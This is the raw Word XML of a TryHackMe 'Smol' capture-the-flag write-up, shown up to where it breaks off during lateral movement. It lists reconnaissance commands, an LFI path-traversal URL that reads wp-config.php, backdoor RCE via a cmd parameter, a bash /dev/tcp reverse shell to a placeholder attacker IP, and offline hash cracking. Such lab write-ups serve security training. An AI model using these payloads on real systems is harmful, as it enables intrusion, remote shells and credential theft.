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D3EE"/>
          <w:sz w:val="80"/>
        </w:rPr>
        <w:t>SMOL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>TryHackMe CTF — Professional Security Write-up</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>WordPress LFI → Backdoor → RCE → Lateral Movement → Root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5120640" cy="3720998"/>
            <wp:docPr id="1" name="Picture 1"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="01-cover-hero.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5120640" cy="3720998"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
        </w:rPr>
        <w:t>Portfolio-safe edition • Flags and secrets redacted</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Document Control</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>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5112"/>
        <w:gridCol w:w="5112"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="111827"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="BAE6FD"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="111827"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="BAE6FD"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>TryHackMe — Smol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Room</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>https://tryhackme.com/room/smol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Evidence date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>26 June 2026 (from supplied lab notes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Publication mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Portfolio-safe; secrets redacted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t>Publication note: flags, passwords, hashes, and private-key material are intentionally redacted. The report preserves the attack chain and defensive interpretation without publishing answer strings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Smol is a multi-stage TryHackMe lab in which a public WordPress installation provides the initial attack surface. Enumeration identifies the jsmol2wp plugin, whose vulnerable file-reading behavior discloses WordPress configuration. That access leads to discovery of a backdoored PHP file in the Hello Dolly plugin, yielding command execution and a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>From the web-server context, the compromise expands through application database hashes, a readable SSH private key, and an encrypted historical WordPress archive. The final account is granted unrestricted sudo access, allowing a root shell. The key professional lesson is that compromise grows through chained trust failures rather than a single isolated bug.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:fill="020617"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>External HTTP → WordPress → jsmol2wp LFI → wp-config → Hello Dolly backdoor → RCE → www-data → diego → think → gege → xavi → sudo ALL → root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>1. Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.1 Port and service discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>A full service scan identifies SSH and HTTP as the relevant exposed services. The supplied evidence reports OpenSSH 8.2p1 and Apache 2.4.41 on Ubuntu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:fill="020617"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>nmap -sV -p- -T4 &lt;LAB_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="1781099"/>
            <wp:docPr id="2" name="Picture 2"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="02-network-recon.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="1781099"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 02 — Network reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.2 Web content discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The virtual host is associated with www.smol.thm. Content discovery confirms WordPress-specific paths including wp-admin, wp-content, wp-includes, and xmlrpc.php.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:fill="020617"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u "http://www.smol.thm/FUZZ" -fc 404 -c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="1922831"/>
            <wp:docPr id="3" name="Picture 3"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="03-web-enumeration.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="1922831"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 03 — Web enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. WordPress and Plugin Fingerprinting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>WPScan identifies the jsmol2wp plugin at version 1.07. The supplied room notes associate this component with CVE-2018-20463 and a Local File Inclusion issue in the jsmol.php handler.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:fill="020617"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>wpscan --url http://www.smol.thm/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="2310232"/>
            <wp:docPr id="4" name="Picture 4"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="04-plugin-enumeration.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="2310232"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 04 — Plugin discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. LFI to wp-config.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The vulnerable query parameter can be combined with a PHP stream wrapper and path traversal to reach the WordPress configuration file outside the plugin directory. The evidence recovers the WordPress database context; the credential itself is not reproduced.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:fill="020617"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&amp;call=getRawDataFromDatabase&amp;query=php://filter/resource=../../../../wp-config.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="1540154"/>
            <wp:docPr id="5" name="Picture 5"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="05-lfi-wp-config-redacted.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="1540154"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 05 — LFI configuration disclosure, password redacted</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. Hello Dolly Backdoor and RCE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The same LFI is used to inspect hello.php. Encoded logic reveals a cmd parameter that is passed to a system execution primitive. This turns access to the WordPress administrative path into command execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:fill="020617"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&amp;call=getRawDataFromDatabase&amp;query=php://filter/resource=../../hello.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="2088185"/>
            <wp:docPr id="6" name="Picture 6"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="06-backdoor-source.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="2088185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 06 — Backdoored plugin source</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:fill="020617"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>http://www.smol.thm/wp-admin/index.php?cmd=whoami</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="3519678"/>
            <wp:docPr id="7" name="Picture 7"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="07-rce-confirmation.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="3519678"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 07 — RCE confirmation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>A short Bash payload is staged from a controlled attacker host and invoked through the command-execution primitive. The received shell is immediately stabilized for reliable terminal interaction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:fill="020617"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>echo "/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/&lt;ATTACKER_IP&gt;/1234 0&gt;&amp;1'" &gt; revshell.sh</w:t>
        <w:br/>
        <w:t>python3 -m http.server 9000</w:t>
        <w:br/>
        <w:t>nc -lnvp 1234</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="1530706"/>
            <wp:docPr id="8" name="Picture 8"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="08-reverse-shell.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="1530706"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 08 — Reverse shell staging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:fill="020617"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>python3 -c 'import pty; pty.spawn("/bin/bash")'</w:t>
        <w:br/>
        <w:t># Ctrl+Z</w:t>
        <w:br/>
        <w:t>stty raw -echo; fg</w:t>
        <w:br/>
        <w:t>export TERM=xterm-256color</w:t>
        <w:br/>
        <w:t>export SHELL=bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>6. Lateral Movement — Database Hashes to diego</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The WordPress database is queried using the recovered lab database account. The wp_users table exposes account records and password hashes, which can be tested offline against a known wordlist.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:fill="020617"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>mysql -u wpuser -p'&lt;LAB_DB_PASSWORD&gt;' wordpress</w:t>
        <w:br/>
        <w:t>SELECT * FROM wp_users;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="1322832"/>
            <wp:docPr id="9" name="Picture 9"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="09-wp-user-db-redacted.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="1322832"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 09 — WordPress user database, hashes redacted</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:fill="020617"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>john diego --wordlist=/usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="1828343"/>
            <wp:docPr id="10" name="Picture 10"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="10-diego-crack-redacted.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="1828343"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
